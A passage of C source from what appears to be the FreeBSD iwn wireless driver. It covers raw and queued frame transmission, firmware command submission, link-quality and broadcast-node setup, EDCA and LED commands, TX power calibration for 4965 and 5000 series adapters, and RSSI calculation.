iwn_tx_cmd *cmd; struct iwn_cmd_data *tx; struct ieee80211_frame *wh; struct iwn_tx_ring *ring; struct iwn_tx_desc *desc; struct iwn_tx_data *data; struct mbuf *m1; bus_dma_segment_t *seg, segs[IWN_MAX_SCATTER]; uint32_t flags; u_int hdrlen; int ac, totlen, error, pad, nsegs = 0, i, rate; uint8_t type; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); IWN_LOCK_ASSERT(sc); wh = mtod(m, struct ieee80211_frame *); hdrlen = ieee80211_anyhdrsize(wh); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; ac = params->ibp_pri & 3; ring = &sc->txq[ac]; desc = &ring->desc[ring->cur]; data = &ring->data[ring->cur]; /* Choose a TX rate. */ rate = params->ibp_rate0; totlen = m->m_pkthdr.len; /* Prepare TX firmware command. 
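 * The layout matches iwn_tx_data(), but the rate, retry counts and
 * protection flags come from the caller-supplied bpf parameters.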
*/ cmd = &ring->cmd[ring->cur]; cmd->code = IWN_CMD_TX_DATA; cmd->flags = 0; cmd->qid = ring->qid; cmd->idx = ring->cur; tx = (struct iwn_cmd_data *)cmd->data; /* NB: No need to clear tx, all fields are reinitialized here. */ tx->scratch = 0; /* clear "scratch" area */ flags = 0; if ((params->ibp_flags & IEEE80211_BPF_NOACK) == 0) flags |= IWN_TX_NEED_ACK; if (params->ibp_flags & IEEE80211_BPF_RTS) { if (sc->hw_type != IWN_HW_REV_TYPE_4965) { /* 5000 autoselects RTS/CTS or CTS-to-self. */ flags &= ~IWN_TX_NEED_RTS; flags |= IWN_TX_NEED_PROTECTION; } else flags |= IWN_TX_NEED_RTS | IWN_TX_FULL_TXOP; } if (params->ibp_flags & IEEE80211_BPF_CTS) { if (sc->hw_type != IWN_HW_REV_TYPE_4965) { /* 5000 autoselects RTS/CTS or CTS-to-self. */ flags &= ~IWN_TX_NEED_CTS; flags |= IWN_TX_NEED_PROTECTION; } else flags |= IWN_TX_NEED_CTS | IWN_TX_FULL_TXOP; } if (type == IEEE80211_FC0_TYPE_MGT) { uint8_t subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; /* Tell HW to set timestamp in probe responses. */ if (subtype == IEEE80211_FC0_SUBTYPE_PROBE_RESP) flags |= IWN_TX_INSERT_TSTAMP; if (subtype == IEEE80211_FC0_SUBTYPE_ASSOC_REQ || subtype == IEEE80211_FC0_SUBTYPE_REASSOC_REQ) tx->timeout = htole16(3); else tx->timeout = htole16(2); } else tx->timeout = htole16(0); if (hdrlen & 3) { /* First segment length must be a multiple of 4. */ flags |= IWN_TX_NEED_PADDING; pad = 4 - (hdrlen & 3); } else pad = 0; if (ieee80211_radiotap_active_vap(vap)) { struct iwn_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; ieee80211_radiotap_tx(vap, m); } tx->len = htole16(totlen); tx->tid = 0; tx->id = sc->broadcast_id; tx->rts_ntries = params->ibp_try1; tx->data_ntries = params->ibp_try0; tx->lifetime = htole32(IWN_LIFETIME_INFINITE); tx->rate = iwn_rate_to_plcp(sc, ni, rate); /* Group or management frame. */ tx->linkq = 0; /* Set physical address of "scratch area". */ tx->loaddr = htole32(IWN_LOADDR(data->scratch_paddr)); tx->hiaddr = IWN_HIADDR(data->scratch_paddr); /* Copy 802.11 header in TX command. */ memcpy((uint8_t *)(tx + 1), wh, hdrlen); /* Trim 802.11 header. */ m_adj(m, hdrlen); tx->security = 0; tx->flags = htole32(flags); error = bus_dmamap_load_mbuf_sg(ring->data_dmat, data->map, m, segs, &nsegs, BUS_DMA_NOWAIT); if (error != 0) { if (error != EFBIG) { device_printf(sc->sc_dev, "%s: can't map mbuf (error %d)\n", __func__, error); m_freem(m); return error; } /* Too many DMA segments, linearize mbuf. */ m1 = m_collapse(m, M_NOWAIT, IWN_MAX_SCATTER); if (m1 == NULL) { device_printf(sc->sc_dev, "%s: could not defrag mbuf\n", __func__); m_freem(m); return ENOBUFS; } m = m1; error = bus_dmamap_load_mbuf_sg(ring->data_dmat, data->map, m, segs, &nsegs, BUS_DMA_NOWAIT); if (error != 0) { device_printf(sc->sc_dev, "%s: can't map mbuf (error %d)\n", __func__, error); m_freem(m); return error; } } data->m = m; data->ni = ni; DPRINTF(sc, IWN_DEBUG_XMIT, "%s: qid %d idx %d len %d nsegs %d\n", __func__, ring->qid, ring->cur, m->m_pkthdr.len, nsegs); /* Fill TX descriptor. */ desc->nsegs = 1; if (m->m_len != 0) desc->nsegs += nsegs; /* First DMA segment is used by the TX command. */ desc->segs[0].addr = htole32(IWN_LOADDR(data->cmd_paddr)); desc->segs[0].len = htole16(IWN_HIADDR(data->cmd_paddr) | (4 + sizeof (*tx) + hdrlen + pad) << 4); /* Other DMA segments are for data payload. 
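 * Each descriptor segment packs the upper address bits and the segment
 * length into a single 16-bit word (length << 4 | high address bits).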
*/ seg = &segs[0]; for (i = 1; i <= nsegs; i++) { desc->segs[i].addr = htole32(IWN_LOADDR(seg->ds_addr)); desc->segs[i].len = htole16(IWN_HIADDR(seg->ds_addr) | seg->ds_len << 4); seg++; } bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(ring->data_dmat, ring->cmd_dma.map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); /* Update TX scheduler. */ if (ring->qid >= sc->firstaggqueue) ops->update_sched(sc, ring->qid, ring->cur, tx->id, totlen); /* Kick TX ring. */ ring->cur = (ring->cur + 1) % IWN_TX_RING_COUNT; IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, ring->qid << 8 | ring->cur); /* Mark TX ring as full if we reach a certain threshold. */ if (++ring->queued > IWN_TX_RING_HIMARK) sc->qfullmsk |= 1 << ring->qid; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return 0; } static int iwn_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct iwn_softc *sc = ifp->if_softc; int error = 0; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { ieee80211_free_node(ni); m_freem(m); return ENETDOWN; } IWN_LOCK(sc); if (params == NULL) { /* * Legacy path; interpret frame contents to decide * precisely how to send the frame. */ error = iwn_tx_data(sc, m, ni); } else { /* * Caller supplied explicit parameters to use in * sending the frame. */ error = iwn_tx_data_raw(sc, m, ni, params); } if (error != 0) { /* NB: m is reclaimed on tx failure */ ieee80211_free_node(ni); ifp->if_oerrors++; } sc->sc_tx_timer = 5; IWN_UNLOCK(sc); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return error; } static void iwn_start(struct ifnet *ifp) { struct iwn_softc *sc = ifp->if_softc; IWN_LOCK(sc); iwn_start_locked(ifp); IWN_UNLOCK(sc); } static void iwn_start_locked(struct ifnet *ifp) { struct iwn_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; IWN_LOCK_ASSERT(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || (ifp->if_drv_flags & IFF_DRV_OACTIVE)) return; for (;;) { if (sc->qfullmsk != 0) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; if (iwn_tx_data(sc, m, ni) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; continue; } sc->sc_tx_timer = 5; } } static void iwn_watchdog(void *arg) { struct iwn_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; IWN_LOCK_ASSERT(sc); KASSERT(ifp->if_drv_flags & IFF_DRV_RUNNING, ("not running")); DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); if (sc->sc_tx_timer > 0) { if (--sc->sc_tx_timer == 0) { if_printf(ifp, "device timeout\n"); ieee80211_runtask(ic, &sc->sc_reinit_task); return; } } callout_reset(&sc->watchdog_to, hz, iwn_watchdog, sc); } static int iwn_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct iwn_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0, stop = 0; switch (cmd) { case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; case SIOCSIFFLAGS: IWN_LOCK(sc); if (ifp->if_flags & IFF_UP) { if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { iwn_init_locked(sc); if (IWN_READ(sc, IWN_GP_CNTRL) & IWN_GP_CNTRL_RFKILL) startall = 1; else stop = 1; } } else { if (ifp->if_drv_flags & 
IFF_DRV_RUNNING) iwn_stop_locked(sc); } IWN_UNLOCK(sc); if (startall) ieee80211_start_all(ic); else if (vap != NULL && stop) ieee80211_stop(vap); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; default: error = EINVAL; break; } return error; } /* * Send a command to the firmware. */ static int iwn_cmd(struct iwn_softc *sc, int code, const void *buf, int size, int async) { struct iwn_tx_ring *ring; struct iwn_tx_desc *desc; struct iwn_tx_data *data; struct iwn_tx_cmd *cmd; struct mbuf *m; bus_addr_t paddr; int totlen, error; int cmd_queue_num; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); if (async == 0) IWN_LOCK_ASSERT(sc); if (sc->sc_flags & IWN_FLAG_PAN_SUPPORT) cmd_queue_num = IWN_PAN_CMD_QUEUE; else cmd_queue_num = IWN_CMD_QUEUE_NUM; ring = &sc->txq[cmd_queue_num]; desc = &ring->desc[ring->cur]; data = &ring->data[ring->cur]; totlen = 4 + size; if (size > sizeof cmd->data) { /* Command is too large to fit in a descriptor. */ if (totlen > MCLBYTES) return EINVAL; m = m_getjcl(M_NOWAIT, MT_DATA, M_PKTHDR, MJUMPAGESIZE); if (m == NULL) return ENOMEM; cmd = mtod(m, struct iwn_tx_cmd *); error = bus_dmamap_load(ring->data_dmat, data->map, cmd, totlen, iwn_dma_map_addr, &paddr, BUS_DMA_NOWAIT); if (error != 0) { m_freem(m); return error; } data->m = m; } else { cmd = &ring->cmd[ring->cur]; paddr = data->cmd_paddr; } cmd->code = code; cmd->flags = 0; cmd->qid = ring->qid; cmd->idx = ring->cur; memcpy(cmd->data, buf, size); desc->nsegs = 1; desc->segs[0].addr = htole32(IWN_LOADDR(paddr)); desc->segs[0].len = htole16(IWN_HIADDR(paddr) | totlen << 4); DPRINTF(sc, IWN_DEBUG_CMD, "%s: %s (0x%x) flags %d qid %d idx %d\n", __func__, iwn_intr_str(cmd->code), cmd->code, cmd->flags, cmd->qid, cmd->idx); if (size > sizeof cmd->data) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_PREWRITE); } else { bus_dmamap_sync(ring->data_dmat, ring->cmd_dma.map, BUS_DMASYNC_PREWRITE); } bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); /* Kick command ring. */ ring->cur = (ring->cur + 1) % IWN_TX_RING_COUNT; IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, ring->qid << 8 | ring->cur); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return async ? 0 : msleep(desc, &sc->sc_mtx, PCATCH, "iwncmd", hz); } static int iwn4965_add_node(struct iwn_softc *sc, struct iwn_node_info *node, int async) { struct iwn4965_node_info hnode; caddr_t src, dst; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* * We use the node structure for 5000 Series internally (it is * a superset of the one for 4965AGN). We thus copy the common * fields before sending the command. */ src = (caddr_t)node; dst = (caddr_t)&hnode; memcpy(dst, src, 48); /* Skip TSC, RX MIC and TX MIC fields from ``src''. */ memcpy(dst + 48, src + 72, 20); return iwn_cmd(sc, IWN_CMD_ADD_NODE, &hnode, sizeof hnode, async); } static int iwn5000_add_node(struct iwn_softc *sc, struct iwn_node_info *node, int async) { DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Direct mapping. */ return iwn_cmd(sc, IWN_CMD_ADD_NODE, node, sizeof (*node), async); } static int iwn_set_link_quality(struct iwn_softc *sc, struct ieee80211_node *ni) { #define RV(v) ((v) & IEEE80211_RATE_VAL) struct iwn_node *wn = (void *)ni; struct ieee80211_rateset *rs; struct iwn_cmd_link_quality linkq; uint8_t txant; int i, rate, txrate; int is_11n; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Use the first valid TX antenna. 
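 * (IWN_LSB() isolates the lowest bit set in the TX chain mask.)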
*/ txant = IWN_LSB(sc->txchainmask); memset(&linkq, 0, sizeof linkq); linkq.id = wn->id; linkq.antmsk_1stream = txant; /* * The '2 stream' setup is a bit .. odd. * * For NICs that support only 1 antenna, default to IWN_ANT_AB or * the firmware panics (eg Intel 5100.) * * For NICs that support two antennas, we use ANT_AB. * * For NICs that support three antennas, we use the two that * wasn't the default one. * * XXX TODO: if bluetooth (full concurrent) is enabled, restrict * this to only one antenna. */ /* So - if there's no secondary antenna, assume IWN_ANT_AB */ /* Default - transmit on the other antennas */ linkq.antmsk_2stream = (sc->txchainmask & ~IWN_LSB(sc->txchainmask)); /* Now, if it's zero, set it to IWN_ANT_AB, so to not panic firmware */ if (linkq.antmsk_2stream == 0) linkq.antmsk_2stream = IWN_ANT_AB; /* * If the NIC is a two-stream TX NIC, configure the TX mask to * the default chainmask */ else if (sc->ntxchains == 2) linkq.antmsk_2stream = sc->txchainmask; linkq.ampdu_max = 32; /* XXX negotiated? */ linkq.ampdu_threshold = 3; linkq.ampdu_limit = htole16(4000); /* 4ms */ DPRINTF(sc, IWN_DEBUG_XMIT, "%s: 1stream antenna=0x%02x, 2stream antenna=0x%02x, ntxstreams=%d\n", __func__, linkq.antmsk_1stream, linkq.antmsk_2stream, sc->ntxchains); /* * Are we using 11n rates? Ensure the channel is * 11n _and_ we have some 11n rates, or don't * try. */ if (IEEE80211_IS_CHAN_HT(ni->ni_chan) && ni->ni_htrates.rs_nrates > 0) { rs = (struct ieee80211_rateset *) &ni->ni_htrates; is_11n = 1; } else { rs = &ni->ni_rates; is_11n = 0; } /* Start at highest available bit-rate. */ /* * XXX this is all very dirty! */ if (is_11n) txrate = ni->ni_htrates.rs_nrates - 1; else txrate = rs->rs_nrates - 1; for (i = 0; i < IWN_MAX_TX_RETRIES; i++) { uint32_t plcp; if (is_11n) rate = IEEE80211_RATE_MCS | rs->rs_rates[txrate]; else rate = RV(rs->rs_rates[txrate]); DPRINTF(sc, IWN_DEBUG_XMIT, "%s: i=%d, txrate=%d, rate=0x%02x\n", __func__, i, txrate, rate); /* Do rate -> PLCP config mapping */ plcp = iwn_rate_to_plcp(sc, ni, rate); linkq.retry[i] = plcp; /* * The mimo field is an index into the table which * indicates the first index where it and subsequent entries * will not be using MIMO. * * Since we're filling linkq from 0..15 and we're filling * from the higest MCS rates to the lowest rates, if we * _are_ doing a dual-stream rate, set mimo to idx+1 (ie, * the next entry.) That way if the next entry is a non-MIMO * entry, we're already pointing at it. */ if ((le32toh(plcp) & IWN_RFLAG_MCS) && RV(le32toh(plcp)) > 7) linkq.mimo = i + 1; /* Next retry at immediate lower bit-rate. */ if (txrate > 0) txrate--; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return iwn_cmd(sc, IWN_CMD_LINK_QUALITY, &linkq, sizeof linkq, 1); #undef RV } /* * Broadcast node is used to send group-addressed and management frames. */ static int iwn_add_broadcast_node(struct iwn_softc *sc, int async) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct iwn_node_info node; struct iwn_cmd_link_quality linkq; uint8_t txant; int i, error; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); sc->rxon = &sc->rx_on[IWN_RXON_BSS_CTX]; memset(&node, 0, sizeof node); IEEE80211_ADDR_COPY(node.macaddr, ifp->if_broadcastaddr); node.id = sc->broadcast_id; DPRINTF(sc, IWN_DEBUG_RESET, "%s: adding broadcast node\n", __func__); if ((error = ops->add_node(sc, &node, async)) != 0) return error; /* Use the first valid TX antenna. 
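 * A note on the rate values chosen just below: these are the same
 * entries the scan path later in this file uses for probe requests,
 * i.e. 0xd is the lowest mandatory OFDM rate (6 Mb/s) for 5 GHz
 * channels and 10 | IWN_RFLAG_CCK is 1 Mb/s CCK for 2 GHz channels;
 * the chosen TX antenna is then OR'ed in with IWN_RFLAG_ANT(txant) and
 * the same entry is replicated across all retry slots.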
*/ txant = IWN_LSB(sc->txchainmask); memset(&linkq, 0, sizeof linkq); linkq.id = sc->broadcast_id; linkq.antmsk_1stream = txant; linkq.antmsk_2stream = IWN_ANT_AB; linkq.ampdu_max = 64; linkq.ampdu_threshold = 3; linkq.ampdu_limit = htole16(4000); /* 4ms */ /* Use lowest mandatory bit-rate. */ if (IEEE80211_IS_CHAN_5GHZ(ic->ic_curchan)) linkq.retry[0] = htole32(0xd); else linkq.retry[0] = htole32(10 | IWN_RFLAG_CCK); linkq.retry[0] |= htole32(IWN_RFLAG_ANT(txant)); /* Use same bit-rate for all TX retries. */ for (i = 1; i < IWN_MAX_TX_RETRIES; i++) { linkq.retry[i] = linkq.retry[0]; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return iwn_cmd(sc, IWN_CMD_LINK_QUALITY, &linkq, sizeof linkq, async); } static int iwn_updateedca(struct ieee80211com *ic) { #define IWN_EXP2(x) ((1 << (x)) - 1) /* CWmin = 2^ECWmin - 1 */ struct iwn_softc *sc = ic->ic_ifp->if_softc; struct iwn_edca_params cmd; int aci; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); memset(&cmd, 0, sizeof cmd); cmd.flags = htole32(IWN_EDCA_UPDATE); for (aci = 0; aci < WME_NUM_AC; aci++) { const struct wmeParams *ac = &ic->ic_wme.wme_chanParams.cap_wmeParams[aci]; cmd.ac[aci].aifsn = ac->wmep_aifsn; cmd.ac[aci].cwmin = htole16(IWN_EXP2(ac->wmep_logcwmin)); cmd.ac[aci].cwmax = htole16(IWN_EXP2(ac->wmep_logcwmax)); cmd.ac[aci].txoplimit = htole16(IEEE80211_TXOP_TO_US(ac->wmep_txopLimit)); } IEEE80211_UNLOCK(ic); IWN_LOCK(sc); (void)iwn_cmd(sc, IWN_CMD_EDCA_PARAMS, &cmd, sizeof cmd, 1); IWN_UNLOCK(sc); IEEE80211_LOCK(ic); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return 0; #undef IWN_EXP2 } static void iwn_update_mcast(struct ifnet *ifp) { /* Ignore */ } static void iwn_set_led(struct iwn_softc *sc, uint8_t which, uint8_t off, uint8_t on) { struct iwn_cmd_led led; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); #if 0 /* XXX don't set LEDs during scan? */ if (sc->sc_is_scanning) return; #endif /* Clear microcode LED ownership. */ IWN_CLRBITS(sc, IWN_LED, IWN_LED_BSM_CTRL); led.which = which; led.unit = htole32(10000); /* on/off in unit of 100ms */ led.off = off; led.on = on; (void)iwn_cmd(sc, IWN_CMD_SET_LED, &led, sizeof led, 1); } /* * Set the critical temperature at which the firmware will stop the radio * and notify us. */ static int iwn_set_critical_temp(struct iwn_softc *sc) { struct iwn_critical_temp crit; int32_t temp; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); IWN_WRITE(sc, IWN_UCODE_GP1_CLR, IWN_UCODE_GP1_CTEMP_STOP_RF); if (sc->hw_type == IWN_HW_REV_TYPE_5150) temp = (IWN_CTOK(110) - sc->temp_off) * -5; else if (sc->hw_type == IWN_HW_REV_TYPE_4965) temp = IWN_CTOK(110); else temp = 110; memset(&crit, 0, sizeof crit); crit.tempR = htole32(temp); DPRINTF(sc, IWN_DEBUG_RESET, "setting critical temp to %d\n", temp); return iwn_cmd(sc, IWN_CMD_SET_CRITICAL_TEMP, &crit, sizeof crit, 0); } static int iwn_set_timing(struct iwn_softc *sc, struct ieee80211_node *ni) { struct iwn_cmd_timing cmd; uint64_t val, mod; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); memset(&cmd, 0, sizeof cmd); memcpy(&cmd.tstamp, ni->ni_tstamp.data, sizeof (uint64_t)); cmd.bintval = htole16(ni->ni_intval); cmd.lintval = htole16(10); /* Compute remaining time until next beacon. 
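 * Illustrative numbers only: with a beacon interval of 100 TU,
 * val = 100 * IEEE80211_DUR_TU = 102400 usec.  If the last TSF
 * timestamp modulo that interval is 30000 usec, then
 *
 *     binitval = 102400 - 30000 = 72400 usec
 *
 * i.e. the firmware is told how long to wait before the next beacon.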
*/ val = (uint64_t)ni->ni_intval * IEEE80211_DUR_TU; mod = le64toh(cmd.tstamp) % val; cmd.binitval = htole32((uint32_t)(val - mod)); DPRINTF(sc, IWN_DEBUG_RESET, "timing bintval=%u tstamp=%ju, init=%u\n", ni->ni_intval, le64toh(cmd.tstamp), (uint32_t)(val - mod)); return iwn_cmd(sc, IWN_CMD_TIMING, &cmd, sizeof cmd, 1); } static void iwn4965_power_calibration(struct iwn_softc *sc, int temp) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Adjust TX power if need be (delta >= 3 degC). */ DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: temperature %d->%d\n", __func__, sc->temp, temp); if (abs(temp - sc->temp) >= 3) { /* Record temperature of last calibration. */ sc->temp = temp; (void)iwn4965_set_txpower(sc, ic->ic_bsschan, 1); } } /* * Set TX power for current channel (each rate has its own power settings). * This function takes into account the regulatory information from EEPROM, * the current temperature and the current voltage. */ static int iwn4965_set_txpower(struct iwn_softc *sc, struct ieee80211_channel *ch, int async) { /* Fixed-point arithmetic division using a n-bit fractional part. */ #define fdivround(a, b, n) \ ((((1 << n) * (a)) / (b) + (1 << n) / 2) / (1 << n)) /* Linear interpolation. */ #define interpolate(x, x1, y1, x2, y2, n) \ ((y1) + fdivround(((int)(x) - (x1)) * ((y2) - (y1)), (x2) - (x1), n)) static const int tdiv[IWN_NATTEN_GROUPS] = { 9, 8, 8, 8, 6 }; struct iwn_ucode_info *uc = &sc->ucode_info; struct iwn4965_cmd_txpower cmd; struct iwn4965_eeprom_chan_samples *chans; const uint8_t *rf_gain, *dsp_gain; int32_t vdiff, tdiff; int i, c, grp, maxpwr; uint8_t chan; sc->rxon = &sc->rx_on[IWN_RXON_BSS_CTX]; /* Retrieve current channel from last RXON. */ chan = sc->rxon->chan; DPRINTF(sc, IWN_DEBUG_RESET, "setting TX power for channel %d\n", chan); memset(&cmd, 0, sizeof cmd); cmd.band = IEEE80211_IS_CHAN_5GHZ(ch) ? 0 : 1; cmd.chan = chan; if (IEEE80211_IS_CHAN_5GHZ(ch)) { maxpwr = sc->maxpwr5GHz; rf_gain = iwn4965_rf_gain_5ghz; dsp_gain = iwn4965_dsp_gain_5ghz; } else { maxpwr = sc->maxpwr2GHz; rf_gain = iwn4965_rf_gain_2ghz; dsp_gain = iwn4965_dsp_gain_2ghz; } /* Compute voltage compensation. */ vdiff = ((int32_t)le32toh(uc->volt) - sc->eeprom_voltage) / 7; if (vdiff > 0) vdiff *= 2; if (abs(vdiff) > 2) vdiff = 0; DPRINTF(sc, IWN_DEBUG_CALIBRATE | IWN_DEBUG_TXPOW, "%s: voltage compensation=%d (UCODE=%d, EEPROM=%d)\n", __func__, vdiff, le32toh(uc->volt), sc->eeprom_voltage); /* Get channel attenuation group. */ if (chan <= 20) /* 1-20 */ grp = 4; else if (chan <= 43) /* 34-43 */ grp = 0; else if (chan <= 70) /* 44-70 */ grp = 1; else if (chan <= 124) /* 71-124 */ grp = 2; else /* 125-200 */ grp = 3; DPRINTF(sc, IWN_DEBUG_CALIBRATE | IWN_DEBUG_TXPOW, "%s: chan %d, attenuation group=%d\n", __func__, chan, grp); /* Get channel sub-band. */ for (i = 0; i < IWN_NBANDS; i++) if (sc->bands[i].lo != 0 && sc->bands[i].lo <= chan && chan <= sc->bands[i].hi) break; if (i == IWN_NBANDS) /* Can't happen in real-life. 
*/ return EINVAL; chans = sc->bands[i].chans; DPRINTF(sc, IWN_DEBUG_CALIBRATE | IWN_DEBUG_TXPOW, "%s: chan %d sub-band=%d\n", __func__, chan, i); for (c = 0; c < 2; c++) { uint8_t power, gain, temp; int maxchpwr, pwr, ridx, idx; power = interpolate(chan, chans[0].num, chans[0].samples[c][1].power, chans[1].num, chans[1].samples[c][1].power, 1); gain = interpolate(chan, chans[0].num, chans[0].samples[c][1].gain, chans[1].num, chans[1].samples[c][1].gain, 1); temp = interpolate(chan, chans[0].num, chans[0].samples[c][1].temp, chans[1].num, chans[1].samples[c][1].temp, 1); DPRINTF(sc, IWN_DEBUG_CALIBRATE | IWN_DEBUG_TXPOW, "%s: Tx chain %d: power=%d gain=%d temp=%d\n", __func__, c, power, gain, temp); /* Compute temperature compensation. */ tdiff = ((sc->temp - temp) * 2) / tdiv[grp]; DPRINTF(sc, IWN_DEBUG_CALIBRATE | IWN_DEBUG_TXPOW, "%s: temperature compensation=%d (current=%d, EEPROM=%d)\n", __func__, tdiff, sc->temp, temp); for (ridx = 0; ridx <= IWN_RIDX_MAX; ridx++) { /* Convert dBm to half-dBm. */ maxchpwr = sc->maxpwr[chan] * 2; if ((ridx / 8) & 1) maxchpwr -= 6; /* MIMO 2T: -3dB */ pwr = maxpwr; /* Adjust TX power based on rate. */ if ((ridx % 8) == 5) pwr -= 15; /* OFDM48: -7.5dB */ else if ((ridx % 8) == 6) pwr -= 17; /* OFDM54: -8.5dB */ else if ((ridx % 8) == 7) pwr -= 20; /* OFDM60: -10dB */ else pwr -= 10; /* Others: -5dB */ /* Do not exceed channel max TX power. */ if (pwr > maxchpwr) pwr = maxchpwr; idx = gain - (pwr - power) - tdiff - vdiff; if ((ridx / 8) & 1) /* MIMO */ idx += (int32_t)le32toh(uc->atten[grp][c]); if (cmd.band == 0) idx += 9; /* 5GHz */ if (ridx == IWN_RIDX_MAX) idx += 5; /* CCK */ /* Make sure idx stays in a valid range. */ if (idx < 0) idx = 0; else if (idx > IWN4965_MAX_PWR_INDEX) idx = IWN4965_MAX_PWR_INDEX; DPRINTF(sc, IWN_DEBUG_CALIBRATE | IWN_DEBUG_TXPOW, "%s: Tx chain %d, rate idx %d: power=%d\n", __func__, c, ridx, idx); cmd.power[ridx].rf_gain[c] = rf_gain[idx]; cmd.power[ridx].dsp_gain[c] = dsp_gain[idx]; } } DPRINTF(sc, IWN_DEBUG_CALIBRATE | IWN_DEBUG_TXPOW, "%s: set tx power for chan %d\n", __func__, chan); return iwn_cmd(sc, IWN_CMD_TXPOWER, &cmd, sizeof cmd, async); #undef interpolate #undef fdivround } static int iwn5000_set_txpower(struct iwn_softc *sc, struct ieee80211_channel *ch, int async) { struct iwn5000_cmd_txpower cmd; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* * TX power calibration is handled automatically by the firmware * for 5000 Series. */ memset(&cmd, 0, sizeof cmd); cmd.global_limit = 2 * IWN5000_TXPOWER_MAX_DBM; /* 16 dBm */ cmd.flags = IWN5000_TXPOWER_NO_CLOSED; cmd.srv_limit = IWN5000_TXPOWER_AUTO; DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: setting TX power\n", __func__); return iwn_cmd(sc, IWN_CMD_TXPOWER_DBM, &cmd, sizeof cmd, async); } /* * Retrieve the maximum RSSI (in dBm) among receivers. 
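 * Both implementations below follow the same recipe: take the strongest
 * per-chain RSSI reported by the PHY, subtract the AGC gain that was in
 * effect, and subtract the fixed IWN_RSSI_TO_DBM offset.  Purely as a
 * worked example (the offset value is an assumption, not taken from
 * this file): a raw RSSI of 97 with an AGC of 30 and an offset of 44
 * would be reported as 97 - 30 - 44 = 23.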
*/ static int iwn4965_get_rssi(struct iwn_softc *sc, struct iwn_rx_stat *stat) { struct iwn4965_rx_phystat *phy = (void *)stat->phybuf; uint8_t mask, agc; int rssi; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); mask = (le16toh(phy->antenna) >> 4) & IWN_ANT_ABC; agc = (le16toh(phy->agc) >> 7) & 0x7f; rssi = 0; if (mask & IWN_ANT_A) rssi = MAX(rssi, phy->rssi[0]); if (mask & IWN_ANT_B) rssi = MAX(rssi, phy->rssi[2]); if (mask & IWN_ANT_C) rssi = MAX(rssi, phy->rssi[4]); DPRINTF(sc, IWN_DEBUG_RECV, "%s: agc %d mask 0x%x rssi %d %d %d result %d\n", __func__, agc, mask, phy->rssi[0], phy->rssi[2], phy->rssi[4], rssi - agc - IWN_RSSI_TO_DBM); return rssi - agc - IWN_RSSI_TO_DBM; } static int iwn5000_get_rssi(struct iwn_softc *sc, struct iwn_rx_stat *stat) { struct iwn5000_rx_phystat *phy = (void *)stat->phybuf; uint8_t agc; int rssi; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); agc = (le32toh(phy->agc) >> 9) & 0x7f; rssi = MAX(le16toh(phy->rssi[0]) & 0xff, le16toh(phy->rssi[1]) & 0xff); rssi = MAX(le16toh(phy->rssi[2]) & 0xff, rssi); DPRINTF(sc, IWN_DEBUG_RECV, 